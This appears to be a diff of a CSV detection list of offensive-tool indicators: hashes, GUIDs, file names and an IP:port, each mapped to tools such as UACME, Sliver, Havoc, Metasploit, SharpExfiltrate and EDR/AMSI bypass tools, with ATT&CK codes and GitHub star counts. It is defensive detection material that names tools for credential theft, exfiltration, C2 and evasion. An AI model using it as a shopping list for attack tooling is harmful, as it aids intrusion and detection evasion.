-"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*365-Stealer.py*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*365-Stealer-master*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" -"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*36F9C306-5F45-4946-A259-610C05BD90DF*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*375D8508-F60D-4E24-9DF6-1E591D2FA474*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*3bb553cd-0a48-402d-9812-8daff60ac628*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*3C601672-7389-42B2-B5C9-059846E1DA88*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*4.5.6.7:1337*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" -"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" -"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*449CE476-7B27-47F5-B09C-570788A2F261*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 